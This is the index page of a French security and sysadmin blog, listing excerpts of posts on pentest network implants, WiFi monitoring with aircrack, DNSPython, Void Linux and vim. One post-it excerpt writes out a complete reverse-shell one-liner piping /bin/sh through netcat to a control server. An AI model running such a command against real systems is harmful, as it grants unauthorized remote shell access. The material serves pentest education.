Posted on sam. 20 février 2021 in tuto • Tagged with infosec, tuto, tools, vpn, sysadmin, pentest
Un outil courant lors d'audits d'intrusion est l'implant réseau : il s'agit d'un petit appareil que l'on va déposer chez la cible et raccorder à son réseau, et qui va nous permettre d'y accéder via une connexion distante, le tout à l'aide d'un tunnel sécurisé. S'il existe des solutions commerciales comme …
Posted on dim. 09 août 2020 in tuto • Tagged with lab, k8s, virtualisation, tuto
Pour différentes raisons, je me suis mis récemment à jouer un peu plus qu'avant avec les conteneurs.
À titre perso, je ne me vois pas quitter la virtualisation classique sur mon infra, j'aime bien l'aspect sécurité apporté par le cloisonnement des différentes machines. Pour autant, j'ai déjà utilisé Docker et …
Posted on mer. 20 mai 2020 in cheatsheet • Tagged with infosec, pentest, wifi, aircrack
N'effectuez ces manipulations que sur des réseaux/machines pour lesquelles vous avez une autorisation explicite.
nmcli dev set wlan0 managed no
airmon-ng start wlan0
L'interface de monitoring est maintenant wlan0mon ou assimilé (check avec …
Posted on ven. 14 juin 2019 in post-it • Tagged with pentest, post-exploitation
Obtenir un reverse shell :
mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1 | nc -X connect -x [IP Proxy]:[Port Proxy] [IP du serveur de contrôle] [Port en écoute pour le reverse shell] > /tmp/f; rm /tmp/f …Posted on ven. 19 avril 2019 in tuto • Tagged with python, dns
DNSPython est un module qui permet de forger et d'envoyer des requêtes DNS, des plus classiques aux plus complexes. Des fonctions de haut niveau vont permettre d'effectuer des requêtes courantes très simplement, et des fonctions de bas niveau permettant de créer sa requête pour prendre en compte les cas les …
Posted on ven. 05 avril 2019 in tuto • Tagged with linux, void, install
Je viens de changer de laptop, et qui dit nouveau laptop, dit nouvelle installation de Linux !
Je reste fidèle à Void Linux que j'utilisais déjà sur mon précédent ordinateur, mais j'ai décidé de conserver le Windows en dual boot au cas où. Donc les caractéristiques de l'installation :
Posted on mer. 27 mars 2019 in post-it • Tagged with linux, astuce
Hello !
Aujourd'hui petite astuce en passant : je viens d'acheter un nouveau PC avec un magnifique écran HiDPI (écran de taille petite ou moyenne avec une très grande résolution). Ce qui est très beau, mais l'installation de Void Linux se faisant via un terminal, les caractères sont ridiculement petits.
Pas de …
Posted on jeu. 18 octobre 2018 in vrac • Tagged with pentest, tools, virtualisation, lab
Depuis un certain temps, j'avais dans la tête l'idée de me créer un lab de pentest chez moi. Le but était d'avoir un "micro-réseau" d'entreprise (avec les éléments qu'on retrouve souvent dans une entreprise classique) pour pouvoir tester des outils et méthodes et monter en compétences sur les différentes technos …
Posted on dim. 18 février 2018 in tuto • Tagged with vim, linux, sysadmin
Trois ans après un premier tuto sur les bases de vim et deux ans après un tuto sur les fonctionnalités avancées, on est repartis pour toujours plus d'astuces pour vim ! (oui, mon rythme de publication ne ressemble à rien...) Du coup, aujourd'hui, on va voir comment vim gère les fichiers …
Posted on mer. 18 janvier 2017 in vrac • Tagged with password, dropbox, infosec, chiffrement
On entend parler régulièrement de fuites de données, en particulier de mots de passe. Le problème est assez important, puisqu'on sait tous que la majorité des gens réutilisent leurs mots de passe sur différents services. Du coup, il ne faut JAMAIS stocker des mots de passe en clair dans une …